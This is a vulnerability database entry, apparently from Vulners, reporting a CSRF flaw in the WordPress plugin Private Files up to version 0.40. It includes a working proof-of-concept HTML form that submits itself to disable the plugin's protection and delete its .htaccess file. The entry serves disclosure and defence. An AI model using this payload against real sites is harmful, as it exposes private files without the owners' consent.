Lucene search

K

Private Files <= 0.40 - Protection Disabling via CSRF

๐Ÿ—“๏ธย 23 May 2022ย 00:00:00Reported byย Daniel RufTypeย 
wpexploit
ย wpexploit
๐Ÿ‘ย 78ย Views

Private Files Protection Vulnerabilit

Show more
Related
Code
<form id="test" action="https://example.com/wp-admin/tools.php?page=privatefiles.php" method="POST">
    <input type="text" name="level" value="-1">
    <input type="text" name="unprotect" value="Unprotect">
    <input type="text" name="submit" value="true">
</form>
<script>
    document.getElementById("test").submit();
</script>

That will also delete the .htaccess

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 May 2022 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.001
78
.json
Report